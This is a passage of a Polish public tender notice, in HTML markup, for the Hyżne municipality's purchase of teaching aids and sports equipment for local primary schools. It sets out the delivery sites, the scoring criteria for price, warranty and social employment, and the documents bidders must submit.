mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych z dowolnej kategorii w obrębie katalogu zdefiniowanego w art. 94 ust. 1 ustawy Pzp.<br/>2.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, w zależności od charakteru czynności, jakie będą wykonywały osoby z grup społecznie marginalizowanych.<br/>3.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej 5 godzin tygodniowo w odniesieniu do każdej z zatrudnionych osób, <br/>w ramach okresu realizacji zamówienia publicznego.<br/>4.	Wykonawca uzyska punkty wyliczone zgodnie z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych <br/>w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>5.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy <br/>0 punktów w tym kryterium.<br/>6.	Maksymalnie w danym kryterium można otrzymać 10,00 pkt<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane z dokładnością do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2.<br/>Zakup i dostawa pomocy dydaktycznych<br/><br/>Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027.<br/>3. Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/>Wykonawcę został określony w załączniku do SWZ 3 b,<br/>4.	Miejsce dostawy:<br/>- Szkoła Podstawowa im. Tadeusza Gajcego w Szklarach, Szklary 148, 36-025 Dylągówka<br/>- Szkoła Podstawowa i. Polskiego Czerwonego Krzyża w Dylągówce, Dylągówka 29, 36-024 Dylągówka<br/>- Szkoła Podstawowa im. Gen. Władysława Sikorskiego w Hyżnem, Hyżne 615 A, 36-024 Hyżne<br/>- Szkoła Podstawowa im. 21 Brygady Strzelców Podhalańskich w Brzezówce, Brzezówka 111, 36-024 Hyżne<br/>- Szkoła Podstawowa im. Św. Jana Kantego w Grzegorzówce, Grzegorzówka 173, 36-025 Dylągówka<br/>5. Dostarczone przedmioty zamówienia muszą być fabrycznie nowe, z bieżącej produkcji, wolne od wad, zapakowane w opakowania umożliwiające jednoznaczną identyfikację zapakowanego produktu.<br/>6. Zaleca się, aby dostarczony asortyment zapakowany był w tekturowych pudełkach, uniemożliwiających uszkodzenie produktów w czasie transportu, zabezpieczony fabrycznie.<br/>6.Odpowiedzialność za uszkodzenia produktów w czasie transportu ponosi Wykonawca.<br/>7. Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca.<br/>8. Zamawiający zastrzega sobie możliwość zwrotu dostarczonego asortymentu<br/>niespełniającego wymogów jakościowych oczekiwanych przez Zamawiającego na koszt Wykonawcy.<br/>9. Przedmiot dostawy musi spełnić wymogi określone obowiązującym prawem, zostać dopuszczony do obrotu handlowego i posiadać wymagane prawem ważne dokumenty, stwierdzające dopuszczenie do stosowania na terenie Polski.<br/>10. Wykonawca przy realizacji zamówienia zobowiązany jest do zachowania dbałości o środowisko naturalne, poprzez m.in. eliminowanie z użycia przedmiotów jednorazowego użytku wykonanych z tworzyw sztucznych, rezygnacji z używania jednorazowych opakowań, toreb, siatek i reklamówek wykonanych z poliolefinowych<br/>tworzyw sztucznych.<br/>11. Wykonawca zobowiązany jest do wykorzystywania przy wykonaniu umowy materiałów, które pochodzą z recyklingu lub podlegają procesowi recyklingu.<br/>12. Minimalny okres gwarancji jakości: 24 miesiące od daty podpisania bezusterkowego protokołu odbioru.<br/>13. Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia zostały określone w załącznikach nr 3b, do SWZ – Kalkulacja cenowa - Opis przedmiotu zamówienia.<br/>14. Charakter przedmiotu zamówienia nie uzasadnia określania wymagań, o których mowa w art. 100 ust 1 ustawy Prawo zamówień publicznych.<br/>15. Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza możliwość składania ofert na każdą część oddzielnie lub na wszystkie razem, nie wprowadza się ograniczeń w tym zakresie.<br/>16.Rozwiązania równoważne <br/>Zgodnie z art. 101 ust. 4 Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>Zgodnie z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywane w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>W każdym przypadku w odniesieniu do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne.<br/><br/> 17. Szczegółowy opis przedmiotu zamówienia określa: <br/>a.	Załącznik nr 3 b, Kalkulacja ceny – Opis przedmiotu zamówienia dla każdej części”<br/>b. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawierające cały opis przedmiotu zamówienia wraz z załącznikami i <br/><br/>Załącznik Nr 1 – Kalkulacja ceny - Opis przedmiotu zamówienia.<br/>Załącznik Nr 2 – Oferta Wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162200-7 - Pomoce i artykuły szkoleniowe</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">37524100-8 - Gry edukacyjne</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">32342300-5 - Mikrofony i zestawy głośnikowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 2 <br/>Zakup i dostawa pomocy dydaktycznych<br/><br/>1.	Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/>2.	Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1 Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/>Dotyczy pozycji nr 7,10,11,15,16,18,20 z załącznika nr 3 b do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu <br/>o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>I I Im dłuższy termin gwarancji jakości tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości– Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów <br/>w danym kryterium tj. 30 pkt. <br/><br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>3. Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	1.	W ramach tego kryterium Wykonawcy ubiegający się <br/>o zamówienie publiczne mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych <br/>z dowolnej kategorii w obrębie katalogu zdefiniowanego <br/>w art. 94 ust. 1 ustawy Pzp.<br/>2.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, w zależności od charakteru czynności, jakie będą wykonywały osoby z grup społecznie marginalizowanych.<br/>3.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej 5 godzin tygodniowo w odniesieniu do każdej z zatrudnionych osób, <br/>w ramach okresu realizacji zamówienia publicznego.<br/>4.	Wykonawca uzyska punkty wyliczone zgodnie z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych <br/>w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>5.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy <br/>0 punktów w tym kryterium.<br/>6.	Maksymalnie w danym kryterium można otrzymać 10,00 pkt<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane <br/>z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3.<br/>Zakup i dostawa pozostałych pomocy dydaktycznych<br/><br/>Przedmiotem zamówienia jest Dostawa sprzętu komputerowego oraz pomocy dydaktycznych w ramach projektu „Rozwój edukacji na terenie gminy Hyżne” FEPK.07.12-IP.01-0016/23 Projekt współfiansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Plus w ramach programu regionalnego Fundusze Europejskie dla Podkarpacia 2021-2027.<br/>3. Zakres dostawy, wymagań Zamawiającego oraz czynności do wykonania przez<br/>Wykonawcę został określony w załączniku do SWZ 3 c<br/>4.	Miejsce dostawy:<br/>- Szkoła Podstawowa im. Tadeusza Gajcego w Szklarach, Szklary 148, 36-025 Dylągówka<br/>- Szkoła Podstawowa i. Polskiego Czerwonego Krzyża w Dylągówce, Dylągówka 29, 36-024 Dylągówka<br/>- Szkoła Podstawowa im. Gen. Władysława Sikorskiego w Hyżnem, Hyżne 615 A, 36-024 Hyżne<br/>- Szkoła Podstawowa im. 21 Brygady Strzelców Podhalańskich w Brzezówce, Brzezówka 111, 36-024 Hyżne<br/>- Szkoła Podstawowa im. Św. Jana Kantego w Grzegorzówce, Grzegorzówka 173, 36-025 Dylągówka<br/>5. Dostarczone przedmioty zamówienia muszą być fabrycznie nowe, z bieżącej produkcji, wolne od wad, zapakowane w opakowania umożliwiające jednoznaczną identyfikację zapakowanego produktu.<br/>6. Zaleca się, aby dostarczony asortyment zapakowany był w tekturowych pudełkach, uniemożliwiających uszkodzenie produktów w czasie transportu, zabezpieczony fabrycznie.<br/>6.Odpowiedzialność za uszkodzenia produktów w czasie transportu ponosi Wykonawca.<br/>7. Wszelkie koszty związane z wykonaniem zamówienia ponosi Wykonawca.<br/>8. Zamawiający zastrzega sobie możliwość zwrotu dostarczonego asortymentu<br/>niespełniającego wymogów jakościowych oczekiwanych przez Zamawiającego na koszt Wykonawcy.<br/>9. Przedmiot dostawy musi spełnić wymogi określone obowiązującym prawem, zostać dopuszczony do obrotu handlowego i posiadać wymagane prawem ważne dokumenty, stwierdzające dopuszczenie do stosowania na terenie Polski.<br/>10. Wykonawca przy realizacji zamówienia zobowiązany jest do zachowania dbałości o środowisko naturalne, poprzez m.in. eliminowanie z użycia przedmiotów jednorazowego użytku wykonanych z tworzyw sztucznych, rezygnacji z używania jednorazowych opakowań, toreb, siatek i reklamówek wykonanych z poliolefinowych<br/>tworzyw sztucznych.<br/>11. Wykonawca zobowiązany jest do wykorzystywania przy wykonaniu umowy materiałów, które pochodzą z recyklingu lub podlegają procesowi recyklingu.<br/>12. Minimalny okres gwarancji jakości: 24 miesiące od daty podpisania bezusterkowego protokołu odbioru.<br/>13. Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia zostały określone w załącznikach nr 3 c do SWZ – Kalkulacja cenowa - Opis przedmiotu zamówienia.<br/>14. Charakter przedmiotu zamówienia nie uzasadnia określania wymagań, o których mowa w art. 100 ust 1 ustawy Prawo zamówień publicznych.<br/>15. Zamówienie zostało podzielone na 3 części. Zamawiający dopuszcza możliwość składania ofert na każdą część oddzielnie lub na wszystkie razem, nie wprowadza się ograniczeń w tym zakresie.<br/>16.Rozwiązania równoważne <br/>Zgodnie z art. 101 ust. 4 Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>Zgodnie z art. 101 ust. 5 Pzp wykonawca, który powołuje się na rozwiązania równoważne opisywane w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>W każdym przypadku w odniesieniu do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne.<br/><br/> 17. Szczegółowy opis przedmiotu zamówienia określa: <br/>a.	Załącznik nr 3 c „ Kalkulacja ceny – Opis przedmiotu zamówienia dla każdej części”<br/>b. Projektowane postanowienia umowy w sprawie zamówienia publicznego zawierające cały opis przedmiotu zamówienia wraz z załącznikami i <br/><br/>Załącznik Nr 1 – Kalkulacja ceny - Opis przedmiotu zamówienia.<br/>Załącznik Nr 2 – Oferta Wykonawcy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37441700-8 - Piłki do ćwiczeń</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37421000-5 - Maty gimnastyczne</p> <p class="mb-0">37461500-2 - Stoły do tenisa stołowego</p> <p class="mb-0">37442900-8 - Różnorodny sprzęt gimnastyczny</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">37524100-8 - Gry edukacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla części nr 3 <br/>Zakup i dostawa pozostałych pomocy dydaktycznych<br/><br/>1.	Zamawiający będzie oceniał oferty według następujących kryteriów: <br/>Nr	Nazwa kryterium	Waga<br/>1	Cena	60<br/>2	Okres gwarancji jakości	30<br/>3	Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	10<br/>Razem	100<br/>2.	Punkty przyznawane będą liczone według następujących wzorów: <br/>Nr i nazwa kryterium	Wzór<br/>1 Cena	Liczba punktów = (Cmin/Co) *waga<br/>gdzie: <br/>Cmin - najniższa cena spośród wszystkich ofert <br/>Co - cena podana w badanej ofercie <br/>2.Okres gwarancji jakości<br/><br/>Dotyczy pozycji nr 2,3,4,8,9,14,15,16,18,20,22,27,28 z załącznika nr 3 c do SWZ	1. Kryterium – „Okres gwarancji jakości”– poszczególnym ofertom zostaną przyznane punkty w oparciu <br/>o zadeklarowaną wartość oferowanego okresu gwarancji jakości na zrealizowane dostawy. <br/>I IIm dłuższy termin gwarancji jakości, tym większa liczba przyznanych punktów. Przy czym minimalny wymagany okres gwarancji jakości wynosi 24 miesiące. <br/>2. W przypadku nie uzupełnienia pola – okres gwarancji jakości– Zamawiający domyślnie ustala minimalny wymagany okres jako 24 miesiące. <br/>3. W przypadku wskazania okresu gwarancji jakości niższego niż minimalny wymagany okres tj. 24 miesiące – oferta będzie podlegać odrzuceniu, jako niezgodna <br/>z treścią SWZ (art. 226 ust 1 pkt 5) <br/>4. W przypadku wskazania okresu gwarancji jakości wyższego niż 36 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 30 pkt. <br/><br/>5. Punktacja: <br/>- okres 24 m-cy – 0 pkt <br/>- okres 30 m-cy – 15 pkt <br/>- okres 36 m-cy – 30 pkt <br/>6. Maksymalnie w danym kryterium można otrzymać 30 pkt. <br/>4 Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia	1.	W ramach tego kryterium Wykonawcy ubiegający się o zamówienie publiczne mają możliwość zadeklarowania zatrudnienia osób społecznie marginalizowanych z dowolnej kategorii w obrębie katalogu zdefiniowanego w art. 94 ust. 1 ustawy Pzp.<br/>2.	Zamawiający dopuszcza zatrudnienie na podstawie stosunku pracy albo umowy cywilnoprawnej, <br/>w zależności od charakteru czynności, jakie będą wykonywały osoby<br/> z grup społecznie marginalizowanych.<br/>3.	Deklarowane zatrudnienie osób z grup społecznie marginalizowanych musi obejmować co najmniej <br/>5 godzin tygodniowo w odniesieniu do każdej <br/>z zatrudnionych osób, w ramach okresu realizacji zamówienia publicznego.<br/>4.	Wykonawca uzyska punkty wyliczone zgodnie <br/>z poniższym wzorem:<br/>Liczba punktów = [Lo / Ln] x 100 pkt x 10%<br/> gdzie:<br/>Lo - zadeklarowana liczba osób społecznie marginalizowanych w badanej ofercie <br/>Ln - najwyższa zadeklarowana liczba osób społecznie marginalizowanych w badanych ofertach <br/>5.	W przypadku braku deklaracji w formularzu ofertowym dotyczącej zatrudnienia osób z grup społecznie marginalizowanych, zamawiający przyzna wykonawcy 0 punktów w tym kryterium.<br/>6.	Maksymalnie w danym kryterium można otrzymać 10,00 pkt<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu. Obliczenie będzie dokonywane <br/>z dokładnością do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób społecznie marginalizowanych w ramach realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.	Oferta musi zawierać:<br/>1)	wypełniony formularz OFERTA - musi być złożony w formie elektronicznej tj. przekazany w postaci elektronicznej i opatrzony kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>2)	oświadczenie/a o braku podstaw wykluczenia zawarte w formularzu OFERTA<br/>– musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>3)	oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego w SWZ zawarte w formularzu OFERTA – musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>4) zobowiązanie podmiotu udostępniającego zasoby lub inny dokument (jeśli dotyczy) – musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>5)	oświadczenie o braku podstaw do wykluczenia podmiotu udostępniającego zasoby (zawarte w druku wzór zobowiązania podmiotu udostępniającego zasoby 1*) musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (wymagane gdy Wykonawca składa dokumenty z pkt. 4)<br/>6)	oświadczenie o spełnianiu warunków udziału w postępowaniu podmiotu udostępniającego zasoby (w zakresie, w jakim wykonawca powołuje się na jego zasoby) - (zawarte w druku wzór zobowiązania podmiotu udostępniającego zasoby 1*) musi być złożone w formie elektronicznej tj. przekazane <br/>w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (wymagane gdy Wykonawca składa dokumenty z pkt. 4)<br/>7)	pełnomocnictwo – jeśli wymagane do reprezentowania Wykonawcy/ów <br/>w przypadku, gdy:<br/>a)	Wykonawcę reprezentuje pełnomocnik,<br/>b)	ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego o treści wymaganej w art. 58 ust. 2 Pzp (dotyczy również wspólników spółki cywilnej) musi być złożone w formie elektronicznej tj. przekazane w postaci elektronicznej i podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>8)	dokument/y potwierdzający/e umocowanie do reprezentowania Wykonawcy i/lub podmiotu udostepniającego zasoby muszą być złożone zgodnie z zasadami wskazanymi w ust. 6-17.<br/>Dokument/y potwierdzający/e umocowanie do reprezentowania podmiotu udostepniającego zasoby składane są tylko w przypadku korzystania z jego zasobów w celu potwierdzenia spełniania warunków.<br/>9)	Kalkulacja ceny – Opis przedmiotu zamówienia - musi być złożony formie elektronicznej tj. przekazany w postaci elektronicznej i opatrzony kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: 